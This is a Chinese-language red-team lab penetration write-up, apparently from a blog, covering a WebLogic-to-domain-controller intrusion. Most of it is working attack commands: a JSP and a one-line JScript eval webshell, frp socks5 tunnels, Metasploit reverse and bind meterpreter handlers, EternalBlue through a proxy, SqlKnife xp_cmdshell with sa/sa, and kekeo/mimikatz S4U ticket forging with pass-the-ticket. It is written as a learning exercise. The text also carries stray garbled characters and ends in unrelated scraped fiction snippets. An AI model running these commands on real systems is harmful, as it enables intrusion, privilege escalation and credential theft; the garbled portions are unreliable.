一次極其曲折的多層靶場滲透--滲透攻擊紅隊(duì)靶場

聲明

以下內(nèi)容扬跋,來自moon_flower作者原創(chuàng),由于傳播双肤,利用此文所提供的信息而造成的任何直接或間接的后果和損失纹磺,均由使用者本人負(fù)責(zé)帖烘,長白山攻防實(shí)驗(yàn)室以及文章作者不承擔(dān)任何責(zé)任。

外網(wǎng)weblogic服務(wù)器

不知道為什么 ping 不通爽航,直接訪問 7001蚓让,上一波 weblogic 掃描器直接拿下

物理路徑:C:\Oracle\Middleware\Oracle_Home\wlserver\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
訪問路徑:
/console/framework/skins/wlsconsole/images/shell.jsp
能傳上但訪問404

寫入uddiexplorer目錄中

物理路徑:
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\隨機(jī)字符\war\shell.jsp
訪問路徑:
/uddiexplorer/shell.jsp
(發(fā)現(xiàn)沒這個(gè)目錄)

寫入應(yīng)用安裝目錄

物理路徑:C:\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\項(xiàng)目名\隨機(jī)字符\war\shell.jsp
訪問路徑:
/項(xiàng)目名/shell.jsp
(也沒路徑)

域內(nèi)個(gè)人PC

[common]
bind_addr =0.0.0.0
bind_port = 7000

跳板機(jī):

[common]
server_addr = 192.168.0.128
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5

用CS派生一個(gè)監(jiān)聽道到 msf乾忱,用msf繼續(xù)打橫向:

use exploit/multi/handler 
set payload windows/meterpreter/reverse_http
set lhost 192.168.0.128
set lport 20001
連上之后遷移進(jìn)程
run post/windows/manage/migrate

msf掛上代理打永恒之藍(lán):

set Proxies socks5:192.168.0.128:7777
set ReverseAllowProxy true

注意這里不要直接用ms17_010_eternalblue打,很容易打藍(lán)屏历极,用 ms17_010_comman彈命令開遠(yuǎn)程桌面打窄瘟。(但這里會(huì)有各種奇奇怪怪的bug,算第三個(gè)坑)

域滲透

先做本機(jī)信息收集趟卸,win7系統(tǒng)蹄葱,另一張網(wǎng)卡10.10.10.0/24,存在域 redteam.red锄列,沒什么補(bǔ)丁图云,探測一下域環(huán)境。然而現(xiàn)在是system權(quán)限不在域中邻邮,考慮用msf的steal_token實(shí)現(xiàn)降權(quán)竣况,重新反彈一個(gè)shell到CS中。

這里嘗試通過委派打其他主機(jī)筒严,其他方式見坑4丹泉。

傳一個(gè)Adfind上去,查找一下配置了委派的用戶

查詢配置了非約束委派的主機(jī):
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
查詢配置了非約束委派的用戶:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
查詢配置了約束委派的主機(jī):
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
查詢配置了約束委派的用戶:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
shell fscan64.exe -np -h 10.10.10.0/24

80沒東西鸭蛙,爆破一下1443的sa用戶摹恨,密碼sa,傳個(gè)工具進(jìn)行連接娶视,這里選用的是SqlKnife

shell SqlKnife.exe -H 10.10.10.18 -P 1433 -u sa -p sa --xpcmd -c whoami
shell SqlKnife.exe -H 10.10.10.18 -P 1433 -u sa -p sa --dbup2 --3 --fix
shell SqlKnife.exe -H 10.10.10.18 -P 1433 -u sa -p sa --dbup2 -c whoami
[common]
server_addr = 10.10.20.12
server_port = 9000
[plugin_socks]
type = tcp
remote_port = 9999
plugin = socks5

frps.ini

[common]
bind_addr =0.0.0.0
bind_port = 9000

https://github.com/RowTeam/SharpSQLTools/帶GUI界面執(zhí)行文件晒哄。但不知道為什么一直沒辦法反彈到cs上,(或許不能彈中繼的中繼?)

最后還是用msf生成正向shell的馬傳到sqlserver上,再用EfsPotato 提權(quán)后去執(zhí)行肪获,得到一個(gè)system權(quán)限的meterpreter.(其實(shí)這里用CS的beacon_tcp也可以實(shí)現(xiàn)正向連接)msf監(jiān)聽:

handler -p windows/x64/meterpreter/bind_tcp -H 10.10.10.18 -P 30003

cs跳板機(jī)正向連接

connect 10.10.10.18 30004
echo ^<%%^@Page Language^=^"Jscript^"%%^>^<%%eval^(Request^.Item^[^"saul^"^]^,^"unsafe^"^)^;%%^> > c:\inetpub\wwwroot\1.aspx

連上webshell之后就要想辦法提權(quán)了

查詢當(dāng)前系統(tǒng)缺失的常見可用于提權(quán)的補(bǔ)肚蘖琛:

systeminfo > micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi" > 1.txt

用生成的

TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi獲取域機(jī)器的ST:

kekeo.exe "tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red" > 2.txt

最后用mimikatz將ST2導(dǎo)入當(dāng)前會(huì)話

mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi

  • 抓密碼或dump密碼,但運(yùn)行mimikatz只能看到saul的密碼贪磺,利用價(jià)值不大硫兰。

  • 嘗試令牌竊取诅愚,但ps中沒有域控進(jìn)程寒锚,遂放棄

  • 已有漏洞,如zerologon的重置密碼等

  • 委派违孝,先打其他主機(jī)

  • 待補(bǔ)充刹前,但可參考

    https://github.com/infosecn1nja/AD-Attack-Defense

  • 沒解決的問題:

  • 一路的坑,之后慢慢填

  • CS和MSF操作上有很多的問題

  • 多層內(nèi)網(wǎng)的反彈shell(后來一直都是正向鏈接雌桑,有防火墻的話就很難受)

  • 沒過殺軟喇喉,大問題

  • 流量不夠隱蔽,沒有很好的利用各種隧道隱藏技術(shù)

  • 參考文獻(xiàn)

    • https://www.sqlsec.com/2018/03/smb.html

    • http://deepmountains.cn/2021/03/08/2.%20Cobalt%20Strike%E4%B9%8Bbeacon%E7%9B%91%E5%90%AC%E5%99%A8/

    • https://www.freebuf.com/vuls/304576.html

    • https://0rangex.github.io/2022/01/26/Domain-penetration_one-stop/

    • https://www.anquanke.com/post/id/250346

    ?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
    • 序言:七十年代末校坑,一起剝皮案震驚了整個(gè)濱河市拣技,隨后出現(xiàn)的幾起案子千诬,更是在濱河造成了極大的恐慌,老刑警劉巖膏斤,帶你破解...
      沈念sama閱讀 211,743評論 6 492
    • 序言:濱河連續(xù)發(fā)生了三起死亡事件徐绑,死亡現(xiàn)場離奇詭異,居然都是意外死亡莫辨,警方通過查閱死者的電腦和手機(jī)傲茄,發(fā)現(xiàn)死者居然都...
      沈念sama閱讀 90,296評論 3 385
    • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來沮榜,“玉大人盘榨,你說我怎么就攤上這事◇∪冢” “怎么了草巡?”我有些...
      開封第一講書人閱讀 157,285評論 0 348
    • 文/不壞的土叔 我叫張陵,是天一觀的道長型酥。 經(jīng)常有香客問我捷犹,道長,這世上最難降的妖魔是什么冕末? 我笑而不...
      開封第一講書人閱讀 56,485評論 1 283
    • 正文 為了忘掉前任萍歉,我火速辦了婚禮,結(jié)果婚禮上档桃,老公的妹妹穿的比我還像新娘枪孩。我一直安慰自己,他們只是感情好藻肄,可當(dāng)我...
      茶點(diǎn)故事閱讀 65,581評論 6 386
    • 文/花漫 我一把揭開白布蔑舞。 她就那樣靜靜地躺著,像睡著了一般嘹屯。 火紅的嫁衣襯著肌膚如雪攻询。 梳的紋絲不亂的頭發(fā)上,一...
      開封第一講書人閱讀 49,821評論 1 290
    • 那天州弟,我揣著相機(jī)與錄音钧栖,去河邊找鬼。 笑死婆翔,一個(gè)胖子當(dāng)著我的面吹牛拯杠,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播啃奴,決...
      沈念sama閱讀 38,960評論 3 408
    • 文/蒼蘭香墨 我猛地睜開眼潭陪,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起依溯,我...
      開封第一講書人閱讀 37,719評論 0 266
    • 序言:老撾萬榮一對情侶失蹤老厌,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后黎炉,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體梅桩,經(jīng)...
      沈念sama閱讀 44,186評論 1 303
    • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
      茶點(diǎn)故事閱讀 36,516評論 2 327
    • 正文 我和宋清朗相戀三年拜隧,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了宿百。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
      茶點(diǎn)故事閱讀 38,650評論 1 340
    • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡洪添,死狀恐怖垦页,靈堂內(nèi)的尸體忽然破棺而出干奢,到底是詐尸還是另有隱情痊焊,我是刑警寧澤,帶...
      沈念sama閱讀 34,329評論 4 330
    • 正文 年R本政府宣布忿峻,位于F島的核電站薄啥,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏逛尚。R本人自食惡果不足惜垄惧,卻給世界環(huán)境...
      茶點(diǎn)故事閱讀 39,936評論 3 313
    • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望绰寞。 院中可真熱鬧到逊,春花似錦、人聲如沸滤钱。這莊子的主人今日做“春日...
      開封第一講書人閱讀 30,757評論 0 21
    • 文/蒼蘭香墨 我抬頭看了看天上的太陽件缸。三九已至铜靶,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間他炊,已是汗流浹背争剿。 一陣腳步聲響...
      開封第一講書人閱讀 31,991評論 1 266
    • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留佑稠,地道東北人秒梅。 一個(gè)月前我還...
      沈念sama閱讀 46,370評論 2 360
    • 正文 我出身青樓旗芬,卻偏偏與公主長得像舌胶,于是被迫代替她去往敵國和親卵迂。 傳聞我的和親對象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
      茶點(diǎn)故事閱讀 43,527評論 2 349

    推薦閱讀更多精彩內(nèi)容